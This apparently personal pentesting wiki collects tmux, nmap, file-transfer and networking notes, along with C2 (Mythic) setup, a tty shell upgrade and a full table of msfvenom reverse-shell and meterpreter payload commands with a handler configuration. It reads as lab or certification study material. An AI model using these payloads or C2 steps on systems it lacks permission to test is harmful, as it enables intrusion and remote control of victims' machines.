Wiki

TMUX

tmux commands

tmux: opens tmux
PREFIX + c: creates a new window
PREFIX + p: jump back to the previous window
PREFIX + <number>: jump to a window by its number
PREFIX + .: move a window to a different number
PREFIX + x: kill the current pane
PREFIX + ,: rename a window
PREFIX + $: rename a session
PREFIX + d: detach from the tmux session
  > tmux attach -t <session name>: get back into tmux
  > tmux new -s <session name>: create a new tmux session
  > tmux kill-session -t <session name>: kill a tmux session
PREFIX + %: split pane vertically (panes side by side)
PREFIX + ": split pane horizontally (panes stacked top and bottom)
PREFIX + z: toggle the current pane to full screen during a split so you can copy its contents from the terminal

tmux essentials

tmux attach -t <name>: attach back into a session
tmux new -s <name>: create new tmux session
tmux source-file ~/.tmux.conf: reload .tmux.conf
tmux ls: show all tmux sessions

tmux-logging

Logging: prefix + shift + p
Screen capture: prefix + alt + p
Save all history: prefix + alt + shift + p
Clear pane history: prefix + alt + c

NMAP

find nmap scripts

locate <service/keyword> | grep '\.nse$'
  > locate http- | grep '\.nse$'
locate '*.nse' | grep <service/keyword>   (quote the glob so the shell does not expand it against the current directory)

network sweep

nmap -sn <IP block>
sudo arp-scan --interface=eth0 192.168.182.0/24

FILE TRANSFER

smb

smbserver.py -smb2support <share name> .
KALI to WINDOWS: copy \\<SMB IP>\<folder>\<file> C:\<file location>
WINDOWS to KALI: copy <file> \\<SMB IP>\<folder>\<file>

Enable-WindowsOptionalFeature -Online -FeatureName "SMB1Protocol-Client" -All if sharing doesn't work. Restart required
**set-executionpolicy remotesigned to enable running scripts

nc

RECEIVING END: nc -l -p <port> > <file>
SENDING END: nc -w 3 <IP> <port> < <file>

python

Python 2: python -m SimpleHTTPServer <port>
Python 3: python -m http.server <port>
  > --directory </path/to/directory>
  > --bind <specific IP>

FULL FUNCTIONING SHELL

spawn tty shell

which python
  > ls /usr/bin | grep python
  > apt list --installed | grep python
  > dpkg -l | grep python
python -c 'import pty; pty.spawn("/bin/bash")' OR python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL + Z to put the remote shell in the background
echo $TERM (copy the value, this is run on your local machine)
stty raw -echo; fg
reset
  > when asked for the terminal type, paste the $TERM value

For further shell enhancement:

ON LOCAL MACHINE: stty -a
  > copy the row and columns value
ON REMOTE MACHINE: stty rows <value> columns <value>

This will make your tty shell use the entire screen, instead of being cut off.
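As an added example (not part of the original wiki), the helper below turns the `stty -a` output copied from the local machine into the `stty rows ... columns ...` line to paste on the remote side; it handles both the GNU/Linux layout ("rows 50; columns 190;") and the BSD/macOS layout ("50 rows; 190 columns;"). The sample output is constructed.

```python
import re

# Added example (not from the wiki): build the remote `stty` command from the
# LOCAL machine's `stty -a` output so the tty shell uses the whole screen.

def _stty_field(name, stty_output):
    """Return the integer value of `name` (rows or columns) from stty -a output.
    GNU prints "rows 50;", BSD/macOS prints "50 rows;"; both forms are accepted."""
    match = re.search(rf"\b{name} (\d+)\b|\b(\d+) {name}\b", stty_output)
    if not match:
        raise ValueError(f"no '{name}' field found in stty output")
    return int(match.group(1) or match.group(2))


def remote_stty_command(stty_output):
    """Build the `stty rows <r> columns <c>` line to run in the remote shell."""
    rows = _stty_field("rows", stty_output)
    cols = _stty_field("columns", stty_output)
    return f"stty rows {rows} columns {cols}"


if __name__ == "__main__":
    # Constructed sample of the first line `stty -a` prints on Linux.
    sample = "speed 38400 baud; rows 50; columns 190; line = 0;"
    print(remote_stty_command(sample))  # stty rows 50 columns 190
```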

PORT FORWARDING

ssh port forwarding

DO THIS ON THE MACHINE THAT YOU WANT TO PORT FORWARD TO (AKA YOUR HOST)

ssh -L <local port>:<destination host>:<destination port> <remote user>@<remote domain/ip>
  > <destination host> is resolved from the remote side; use 127.0.0.1 for a service listening on the remote machine itself

INSTALLATIONS

C2

Mythic

git clone https://github.com/its-a-feature/Mythic
sudo ./mythic-cli mythic start
sudo nano .env (if you want to edit the configuration)

./install_docker_ubuntu
sudo ./mythic-cli mythic start
sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo.git
sudo ./mythic-cli install github https://github.com/MythicAgents/Medusa.git
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http.git

Covenant


jVis


Docker

DOCKER
printf "%s\n" "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-ce-archive-keyring.gpg] https://download.docker.com/linux/debian buster stable" | sudo tee /etc/apt/sources.list.d/docker-ce.list
curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/docker-ce-archive-keyring.gpg
sudo apt install docker-ce docker-ce-cli

DOCKER-COMPOSE
sudo curl -L "https://github.com/docker/compose/releases/download/v2.1.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose (if docker-compose is still not found)

AutoRecon

autorecon <IP 1> <IP 2> -o <output location>
  > autorecon <hostname 1>
  > autorecon <IP block/24>
  > autorecon -t <target file>

METASPLOIT

msfvenom

Non-Meterpreter

Windows

STAGED
x86: msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
STAGELESS
x86: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Linux

STAGED
x86: msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
STAGELESS
x86: msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Web

asp: msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jsp: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
war: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
php: msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Meterpreter

Windows

STAGED
x86: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
STAGELESS
x86: msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Linux

STAGED
x86: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
STAGELESS
x86: msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Web

asp: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jsp: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
war: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
php: msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Staged and meterpreter payloads need a matching handler listening before the payload runs:

use exploit/multi/handler
set payload <payload>
  > set payload windows/shell/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
run

Once a session is open, run the local exploit suggester against it:

run post/multi/recon/local_exploit_suggester

NETWORKING

setting static IPs

**Small note: These methods will disconnect you from your session if you are doing it remotely. I had console access to complete this setup. To make sure this goes off without a hitch, I found a StackOverflow page on it.

Set the promote_secondaries parameter on your ethernet adapter, or globally on all of the interfaces:

echo 1 > /proc/sys/net/ipv4/conf/eth0/promote_secondaries 
OR 
sysctl net.ipv4.conf.eth0.promote_secondaries=1

Ubuntu

First copy the file and make a backup just in case

cp /etc/netplan/01-netcfg.yaml /etc/netplan/01-netcfg.yaml.bak

Edit the config file

# This is the network config written by 'subiquity'
# ORIGINAL FILE WITH DHCP ENABLED
network:
  ethernets:
    eth0:   # or enp0s3, whichever your adapter is called
      dhcp4: true
  version: 2

# This is the network config written by 'subiquity'
# NEW CONFIG FILE WITH STATIC IP SET UP
network:
  ethernets:
    eth0:   # or enp0s3, whichever your adapter is called
      dhcp4: no
      addresses: [<IP>/<prefix length>]
      gateway4: 192.168.0.1
      nameservers:
        addresses: [<DNS server(s)>]
  version: 2

Restart network service

sudo netplan try
sudo netplan apply

CentOS

First copy the file and make a backup just in case

cp /etc/sysconfig/network-scripts/ifcfg-<NETWORK-ADAPTER> /etc/sysconfig/network-scripts/ifcfg-<NETWORK-ADAPTER>.bak

Edit the config file

# ORIGINAL FILE WITH DHCP ENABLED

TYPE=Ethernet
PROXY_METHOD=none
BROWSER_ONLY=no
BOOTPROTO=dhcp
DEFROUTE=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_FAILURE_FATAL=no
NAME=eth0
UUID=be36f738-af9e-4ea7-b93e-f555e6d45cec
DEVICE=eth0
ONBOOT=yes

# NEW CONFIG FILE WITH STATIC IP SET UP

TYPE=Ethernet
PROXY_METHOD=none
BROWSER_ONLY=no
BOOTPROTO=none
IPADDR=<IP>
PREFIX=<prefix length, e.g. 24>
GATEWAY=<Gateway IP>
DNS1=<DNS server>
DNS2=<DNS server>
DEFROUTE=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_FAILURE_FATAL=no
NAME=eth0
UUID=be36f738-af9e-4ea7-b93e-f555e6d45cec
DEVICE=eth0
ONBOOT=yes

Restart network service

sudo ifdown <network adapter>
sudo ifup <network adapter>
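As an added example (not part of the original wiki) serving both the Ubuntu and CentOS sections above, the script below checks a static IP plan for the mistakes that lock you out of a remote box (gateway outside the subnet, mistyped address or DNS server) and then renders the netplan and ifcfg snippets from it. The interface name, addresses and DNS servers in the sample plan are constructed.

```python
import ipaddress

# Added example (not from the wiki): check a static IP plan for mistakes that lock
# you out of a remote box, then render the netplan and ifcfg snippets used above.

def check_static_ip(address, gateway, dns):
    """Return a list of problems; empty means the plan is consistent.
    address is written with its prefix, e.g. "192.168.0.50/24"."""
    problems = []
    try:
        iface = ipaddress.ip_interface(address)
    except ValueError as exc:
        return [f"address {address!r}: {exc}"]
    try:
        gw = ipaddress.ip_address(gateway)
        if gw not in iface.network:
            problems.append(f"gateway {gateway} is not inside {iface.network}")
        elif gw == iface.ip:
            problems.append(f"gateway {gateway} equals the host address")
    except ValueError as exc:
        problems.append(f"gateway {gateway!r}: {exc}")
    for server in dns:
        try:
            ipaddress.ip_address(server)
        except ValueError as exc:
            problems.append(f"dns {server!r}: {exc}")
    return problems

def netplan_yaml(ifname, address, gateway, dns):
    """Ubuntu netplan file as above (gateway4 as on the page; newer netplan prefers routes:)."""
    return ("network:\n  ethernets:\n"
            f"    {ifname}:\n      dhcp4: no\n"
            f"      addresses: [{address}]\n      gateway4: {gateway}\n"
            f"      nameservers:\n        addresses: [{', '.join(dns)}]\n"
            "  version: 2\n")

def ifcfg_lines(ifname, address, gateway, dns):
    """CentOS ifcfg-<ifname> keys that change when moving from DHCP to static."""
    iface = ipaddress.ip_interface(address)
    lines = ["BOOTPROTO=none", f"IPADDR={iface.ip}", f"PREFIX={iface.network.prefixlen}",
             f"GATEWAY={gateway}"] + [f"DNS{i}={s}" for i, s in enumerate(dns, 1)]
    return lines + [f"NAME={ifname}", f"DEVICE={ifname}", "ONBOOT=yes"]

if __name__ == "__main__":
    # Constructed sample plan; adjust to your network before applying anything.
    plan = ("eth0", "192.168.0.50/24", "192.168.0.1", ["1.1.1.1", "9.9.9.9"])
    if errs := check_static_ip(*plan[1:]):
        raise SystemExit("\n".join(errs))
    print(netplan_yaml(*plan))
    print("\n".join(ifcfg_lines(*plan)))
```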